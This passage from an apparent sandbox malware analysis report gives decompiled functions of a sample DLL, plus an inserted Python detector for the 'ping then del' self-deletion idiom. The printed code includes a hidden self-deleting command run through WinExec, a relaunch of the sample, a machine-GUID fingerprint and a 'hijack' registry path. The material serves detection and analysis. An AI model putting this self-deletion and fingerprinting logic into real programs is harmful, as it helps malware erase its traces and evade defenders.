• CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
• CloseHandle.KERNEL32(?), ref: 1001A239
• CloseHandle.KERNEL32(?), ref: 1001A243
Strings
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: CloseHandle_memset$CreateProcess
• String ID: D
• API String ID: 1151464618-2746444292
• Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
• Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
• Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
• Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E1001A260() {
				char _v267;
				char _v268;                              // command-line buffer: _v268 plus 0x103 bytes from _v267 (0x104 total)
				char _v531;
				char _v532;                              // own-module path buffer, same 0x104 layout
				int _t15;
				void* _t20;

				_v532 = 0;
				E1000CF20(_t20,  &_v531, 0, 0x103);      // _memset (per Similarity API ID)
				_v268 = 0;
				E1000CF20(_t20,  &_v267, 0, 0x103);
				GetModuleFileNameA(0,  &_v532, 0x104);   // full path of the running sample
				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532); // _sprintf: own path becomes the del target
				_t15 = WinExec( &_v268, 0); // executed; SW_HIDE. ping 127.0.0.1 -n 3 stalls cmd.exe for a few seconds so this process can exit and release its file lock, then del removes the sample (self-deletion)
				return _t15;
			}

Statement addresses: 0x1001a269 0x1001a27e 0x1001a286 0x1001a29b 0x1001a2b1 0x1001a2ca 0x1001a2db 0x1001a2e4

APIs
Strings
• cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
Memory Dump Source
• Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
• Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
• Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
• Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$ExecFileModuleName_sprintf
• String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
• API String ID: 2874319085-10483710
• Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
• Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
• Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
• Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
Uniqueness

Uniqueness Score: -1.00%
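The command line E1001A260 builds above (cmd /c ping 127.0.0.1 -n 3 & del "<own path>") is the behaviour the report flags as "Uses ping.exe to sleep": ping is only there as a delay, and the del that follows it removes the sample's own executable. The detector below is an added example, not code from this report or from the sample; it runs over constructed process-creation records with Sysmon-style ParentImage/Image/CommandLine fields and goes slightly beyond the exact string seen here, accepting && chaining, output redirection, del switches, -n placed before or after the host, and the erase alias. Event records, field names and the Finding type are assumptions made for the example.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed process-creation records in Sysmon Event ID 1 style (not taken from the report).
# Event 0 mirrors the command line E1001A260 builds; the others are variants and benign look-alikes.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\user\Desktop\fnhcdXEfus.exe",
     "Image": r"C:\Windows\SysWOW64\cmd.exe",
     "CommandLine": r'cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\user\Desktop\fnhcdXEfus.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c ping 127.0.0.1 -n 3 > nul && del /f /q "C:\Users\user\AppData\Local\Temp\upd.exe"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c ping -n 5 127.0.0.1 > nul & erase /q C:\ProgramData\loader.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c ping 8.8.8.8 -n 4"},                 # connectivity check, no del
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd /c del "C:\Temp\old.log"'},             # del without a ping delay
]

PING_RE = re.compile(r"\bping(?:\.exe)?\b(?P<args>[^&|]*)", re.IGNORECASE)
COUNT_RE = re.compile(r"-n\s+(\d+)", re.IGNORECASE)
DEL_RE = re.compile(r"\b(?:del|erase)\b(?P<args>[^&|]*)", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]+)"|(\S+)')


@dataclass
class Finding:
    delay_seconds: int      # ping sends one echo request per second, so -n N is roughly N seconds
    target: str             # file removed by the chained del
    deletes_parent: bool    # True when that file is the parent's own image (self-deletion)


def _del_target(del_args: str) -> Optional[str]:
    """Last non-switch argument of del/erase, quoted or bare."""
    tokens = [quoted or bare for quoted, bare in TOKEN_RE.findall(del_args)]
    tokens = [t for t in tokens if not t.startswith("/")]
    return tokens[-1] if tokens else None


def detect_ping_sleep_delete(event: dict) -> Optional[Finding]:
    """Match `ping ... -n N` chained (& or &&) into a later del/erase in one command line."""
    cmd = event.get("CommandLine", "")
    ping = PING_RE.search(cmd)
    if not ping:
        return None
    dele = DEL_RE.search(cmd, ping.end())        # the del must follow the ping, not precede it
    if not dele:
        return None
    count = COUNT_RE.search(ping.group("args"))
    delay = int(count.group(1)) if count else 4  # Windows ping sends 4 requests by default
    target = _del_target(dele.group("args"))
    if target is None:
        return None
    parent = event.get("ParentImage", "")
    return Finding(delay, target, target.lower() == parent.lower())


def scan(events: List[dict]) -> List[Tuple[int, Finding]]:
    """Return (index, Finding) for every event that matches."""
    hits = []
    for i, ev in enumerate(events):
        finding = detect_ping_sleep_delete(ev)
        if finding is not None:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for i, finding in scan(SAMPLE_EVENTS):
        tag = "SELF-DELETE" if finding.deletes_parent else "delayed delete"
        print(f"event {i}: {tag}, ~{finding.delay_seconds}s via ping, target={finding.target}")
```

The idiom is also used by legitimate updaters and installer scripts, so the deletes_parent flag (the del target equals the parent's image, exactly the case this sample produces because WinExec is called from the sample itself) is the part worth alerting on; a plain ping-then-del match is better treated as an enrichment signal. The regex deliberately stops each segment at & or | so a del placed before the ping is not counted.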

C-Code - Quality: 87%
			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v52;                               // local string object (assumption: E10001160/E10001A90/E10001200/E10001110/E100011A0 are its ctor/append/length/copy/dtor)
				char _v53;
				short _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v72;                               // small buffer for the "%d" text
				char _v335;
				char _v336;                              // own-module path buffer, 0x104 bytes
				signed int _v340;
				void* __ebp;
				intOrPtr _t40;
				void* _t45;
				intOrPtr _t73;

				_t80 = __eflags;
				_t71 = __edi;
				_push(0xffffffff);                       // SEH frame registration (MSVC unwind prologue)
				_push(E10022A9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t73;
				_v340 = 0;
				E10001160( &_v52, __eflags, 0x10024ca1);
				_v8 = 0;
				_v336 = 0;
				E1000CF20(__edi,  &_v335, 0, 0x103);     // _memset
				GetModuleFileNameA(0,  &_v336, 0x104);
				_t40 = E1001A170( &_v336); // executed; E1001A170 appears to be the CreateProcessA wrapper whose tail ends at 0x1001a256 above, so the sample is relaunched with its own path as the command line
				_v24 = _t40;
				_v72 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v53 = 0;
				E1000CC93(_t71,  &_v72, "%d", _v24);     // _sprintf: decimal text of the E1001A170 result
				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72); // helper not decompiled on this page
				_t81 = _v20;
				if(_v20 != 0) {
					E10001A90( &_v52, _t81, _v20);       // append helper result
					E10001A90( &_v52, _t81, ".exe");     // append ".exe"
					_push(_v20);
					E1000CA30(__ebx, _t71, __esi, _t81); // releases _v20 (assumption: free)
				}
				_t45 = E10001200( &_v52);
				_t82 = _t45;
				if(_t45 == 0) {                          // nothing built: fall back to a fixed name
					E10001A90( &_v52, _t82, "baidu.exe");
				}
				E10001110(_a4, _t82,  &_v52);            // copy into the caller-supplied return object _a4
				_v340 = _v340 | 0x00000001;
				_v8 = 0xffffffff;
				E100011A0( &_v52);                       // destroy the local string
				 *[fs:0x0] = _v16;                       // restore previous SEH frame
				return _a4;
			}

Statement addresses: 0x1001a600 0x1001a600 0x1001a603 0x1001a605 0x1001a610 0x1001a611 0x1001a61e 0x1001a630 0x1001a635 0x1001a63c 0x1001a651 0x1001a667 0x1001a674 0x1001a67c 0x1001a67f 0x1001a685 0x1001a688 0x1001a68b 0x1001a68e 0x1001a691 0x1001a695 0x1001a6a5 0x1001a6b9 0x1001a6bc 0x1001a6c0 0x1001a6c9
                                                                                                                                                                          0x1001a6d6
                                                                                                                                                                          0x1001a6de
                                                                                                                                                                          0x1001a6df
                                                                                                                                                                          0x1001a6e4
                                                                                                                                                                          0x1001a6ea
                                                                                                                                                                          0x1001a6ef
                                                                                                                                                                          0x1001a6f1
                                                                                                                                                                          0x1001a6fb
                                                                                                                                                                          0x1001a6fb
                                                                                                                                                                          0x1001a707
                                                                                                                                                                          0x1001a715
                                                                                                                                                                          0x1001a71b
                                                                                                                                                                          0x1001a725
                                                                                                                                                                          0x1001a730
                                                                                                                                                                          0x1001a73a

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001A651
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A170: FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                                            • Part of subcall function 1001A170: FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                            • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                          • String ID: .exe$baidu.exe
                                                                                                                                                                          • API String ID: 3164538923-2273953317
                                                                                                                                                                          • Opcode ID: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                                          • Instruction ID: 0ef21a583f90a00b500e35e1eebf572a8ff7ffe47b4923fec59976459a260394
                                                                                                                                                                          • Opcode Fuzzy Hash: 6155266f678a46619d4ca9463cf7ffd27ab6c698a31a6eca33ad5587de07f9b5
                                                                                                                                                                          • Instruction Fuzzy Hash: E73169B5C10258ABEB14DFA0ED82FEDB7B4FF09744F000169F50AA7281EB746A44CB91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                                                          			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                                          				char _v8;
                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                          				char _v44;
                                                                                                                                                                          				char _v311;
                                                                                                                                                                          				char _v312;
                                                                                                                                                                          				char _v575;
                                                                                                                                                                          				char _v576;
                                                                                                                                                                          				void* _t30;
                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                          				void* _t50;
                                                                                                                                                                          
                                                                                                                                                                          				_t50 = __eflags;
                                                                                                                                                                          				_t41 = __edi;
                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                          				_push(E10022ADF);
                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                          				 *[fs:0x0] = _t43;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_v576 = 0;
                                                                                                                                                                          				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                                          				_v312 = 0;
                                                                                                                                                                          				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                                          				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
                                                                                                                                                                          				GetTempPathA(0x104,  &_v576);
                                                                                                                                                                          				_push(E100011E0( &_a4));
                                                                                                                                                                          				_push(E100011E0( &_v44));
                                                                                                                                                                          				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                                          				E1001A1D0(_t50,  &_v312); // executed
                                                                                                                                                                          				E100011A0( &_v44);
                                                                                                                                                                          				_v8 = 0xffffffff;
                                                                                                                                                                          				_t30 = E100011A0( &_a4);
                                                                                                                                                                          				 *[fs:0x0] = _v16;
                                                                                                                                                                          				return _t30;
                                                                                                                                                                          			}

                                                                                                                                                                          Disassembly listing (only instruction addresses 0x1001fdc0 to 0x1001fe9d survived extraction; instruction text not available)

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                                          • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                                            • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                                            • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                                            • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                                          • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                                            • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                                            • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                                            • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                                          • String ID: %s%s 200 %s
                                                                                                                                                                          • API String ID: 3552933064-2772210913
                                                                                                                                                                          • Opcode ID: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                                          • Instruction ID: 9fe4303920e8fa691f1d764f20975ef76de67e86ffe0158f2e00fcfb91787ceb
                                                                                                                                                                          • Opcode Fuzzy Hash: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                                          • Instruction Fuzzy Hash: 341198B6C00208ABE714EB90DC56FDE7778EB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                          			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                          				char _v12;
                                                                                                                                                                          				char _v275;
                                                                                                                                                                          				char _v276;
                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                          				void* _t20;
                                                                                                                                                                          				void* _t37;
                                                                                                                                                                          
                                                                                                                                                                          				_t37 = __eflags;
                                                                                                                                                                          				_t28 = __edi;
                                                                                                                                                                          				_v276 = 0;
                                                                                                                                                                          				E1000CF20(__edi,  &_v275, 0, 0x103);
                                                                                                                                                                          				_v12 = 0x104;
                                                                                                                                                                          				E1001A2F0( &_v276,  &_v12); // executed
                                                                                                                                                                          				E1000CD96( &_v276,  &_v276, 0x104, "hijack");
                                                                                                                                                                          				_v8 = E1001A480(__ebx,  &_v276, _t28, __esi, _t37,  &_v276);
                                                                                                                                                                          				_t20 = E1000CC93(_t28, _a4, "SOFTWARE\\Microsoft\\%s", _v8);
                                                                                                                                                                          				_t38 = _v8;
                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                          					_push(_v8);
                                                                                                                                                                          					return E1000CA30(__ebx, _t28, __esi, _t38);
                                                                                                                                                                          				}
                                                                                                                                                                          				return _t20;
                                                                                                                                                                          			}

                                                                                                                                                                           Instruction addresses (one per statement of the listing above): 0x1001f990, 0x1001f990, 0x1001f999, 0x1001f9ae, 0x1001f9b6, 0x1001f9c8, 0x1001f9e1, 0x1001f9f8, 0x1001fa08, 0x1001fa10, 0x1001fa14, 0x1001fa19, 0x00000000, 0x1001fa1f, 0x1001fa25

                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 1001F9AE
                                                                                                                                                                            • Part of subcall function 1001A2F0: RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                          • _strcat_s.LIBCMT ref: 1001F9E1
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                                            • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                                            • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                                            • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                                          • _sprintf.LIBCMT ref: 1001FA08
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                                            • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                                            • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                                            • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastOpen___sbh_find_block___sbh_free_block_strcat_s
                                                                                                                                                                          • String ID: SOFTWARE\Microsoft\%s$hijack
                                                                                                                                                                          • API String ID: 3138967372-3622423033
                                                                                                                                                                          • Opcode ID: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                                          • Instruction ID: 9399b5cfcd873c48396239d23a26fdd32b2e9067639008cfe42ca2b6aed02eb6
                                                                                                                                                                          • Opcode Fuzzy Hash: c9863ae6c296c7f05b6b83cc5fcf0fed57e37d921fde0571c35ff9a54b57ca02
                                                                                                                                                                          • Instruction Fuzzy Hash: 7D0152FAC0020CA7DB15D7A0EC47FE97378DB58304F0404A9E61856141F6B5A7C8CB92
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E1001A2F0(char* _a4, int* _a8) {
                                                                                                                                                                          				void* _v8;
                                                                                                                                                                          				int* _v12;
                                                                                                                                                                          				long _t11;
                                                                                                                                                                          				long _t13;
                                                                                                                                                                          
                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                          				_t11 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Cryptography", 0, 0x101,  &_v8); // executed
                                                                                                                                                                          				if(_t11 == 0) {
                                                                                                                                                                          					_t13 = RegQueryValueExA(_v8, "MachineGuid", 0, 0, _a4, _a8); // executed
                                                                                                                                                                          					if(_t13 == 0) {
                                                                                                                                                                          						_v12 = 1;
                                                                                                                                                                          					}
                                                                                                                                                                          					RegCloseKey(_v8); // executed
                                                                                                                                                                          					return _v12;
                                                                                                                                                                          				}
                                                                                                                                                                          				return 0;
                                                                                                                                                                          			}

                                                                                                                                                                           Instruction addresses (one per statement of the listing above): 0x1001a2f6, 0x1001a2fd, 0x1001a319, 0x1001a321, 0x1001a33c, 0x1001a344, 0x1001a34a, 0x1001a34a, 0x1001a355, 0x00000000, 0x1001a35b, 0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Cryptography,00000000,00000101,00000000), ref: 1001A319
                                                                                                                                                                          • RegQueryValueExA.KERNELBASE(00000000,MachineGuid,00000000,00000000,00000000,?), ref: 1001A33C
                                                                                                                                                                          • RegCloseKey.KERNELBASE(00000000), ref: 1001A355
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250342481.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                          • String ID: MachineGuid$Software\Microsoft\Cryptography
                                                                                                                                                                          • API String ID: 3677997916-880526231
                                                                                                                                                                          • Opcode ID: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                                          • Instruction ID: 9e24c58cdf23cf18939fbcaabd435f76492adcd0c706e8d6ab3c4d486606bf24
                                                                                                                                                                          • Opcode Fuzzy Hash: f1368378e2473503bb2df203a544f45284ed9076fd4207f94550af1e67aefda2
                                                                                                                                                                          • Instruction Fuzzy Hash: 71F0F474600208FBEB10DFA4CC85F9D77B8EB04745F608044FA15AA180D775DB819765
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                          			E1001F4A0(void* _a4, char* _a8) {
                                                                                                                                                                          				char* _v8;
                                                                                                                                                                          				struct _FILETIME _v12;
                                                                                                                                                                          				void* _v16;
                                                                                                                                                                          				struct _SYSTEMTIME _v32;
                                                                                                                                                                          				char* _v40;
                                                                                                                                                                          				char* _v44;
                                                                                                                                                                          				struct _FILETIME _v52;
                                                                                                                                                                          				long _t27;
                                                                                                                                                                          				char* _t43;
                                                                                                                                                                          
                                                                                                                                                                          				_v44 = 0;
                                                                                                                                                                          				_v40 = 0;
                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                          				_t27 = RegOpenKeyExA(_a4, _a8, 0, 0x101,  &_v16); // executed
                                                                                                                                                                          				if(_t27 == 0) {
                                                                                                                                                                          					if(RegQueryInfoKeyA(_v16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  &_v12) == 0) {
                                                                                                                                                                          						_v32.wYear = 0x7b2;
                                                                                                                                                                          						_v32.wMonth = 1;
                                                                                                                                                                          						_v32.wDay = 1;
                                                                                                                                                                          						_v32.wHour = 0;
                                                                                                                                                                          						_v32.wMinute = 0;
                                                                                                                                                                          						_v32.wSecond = 0;
                                                                                                                                                                          						_v32.wMilliseconds = 0;
                                                                                                                                                                          						SystemTimeToFileTime( &_v32,  &_v52);
                                                                                                                                                                          						_t43 = _v8;
                                                                                                                                                                          						asm("sbb edx, [ebp-0x2c]");
                                                                                                                                                                          						_v44 = E1000F290(_v12 - _v52.dwLowDateTime, _t43, 0x2710, 0);
                                                                                                                                                                          						_v40 = _t43;
                                                                                                                                                                          					}
                                                                                                                                                                          					RegCloseKey(_v16);
                                                                                                                                                                          				}
                                                                                                                                                                          				return _v44;
                                                                                                                                                                          			}
                                                                                                                                                                           Addresses
                                                                                                                                                                           • 0x1001f4a6, 0x1001f4ad, 0x1001f4b4, 0x1001f4ce, 0x1001f4d6, 0x1001f500, 0x1001f502, 0x1001f508, 0x1001f50e, 0x1001f514, 0x1001f51a, 0x1001f520, 0x1001f526, 0x1001f534, 0x1001f540, 0x1001f543, 0x1001f554, 0x1001f557, 0x1001f557, 0x1001f55e, 0x1001f55e, 0x1001f56d

                                                                                                                                                                          APIs
                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00000101,00000000), ref: 1001F4CE
                                                                                                                                                                          • RegQueryInfoKeyA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 1001F4F8
                                                                                                                                                                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F534
                                                                                                                                                                          • __aulldiv.LIBCMT ref: 1001F54F
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1001F55E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.248003086.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                           • Associated: 00000000.00000002.247990829.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.248179880.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250317825.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                                           • Associated: 00000000.00000002.250332370.0000000010337000.00000002.00000001.sdmp
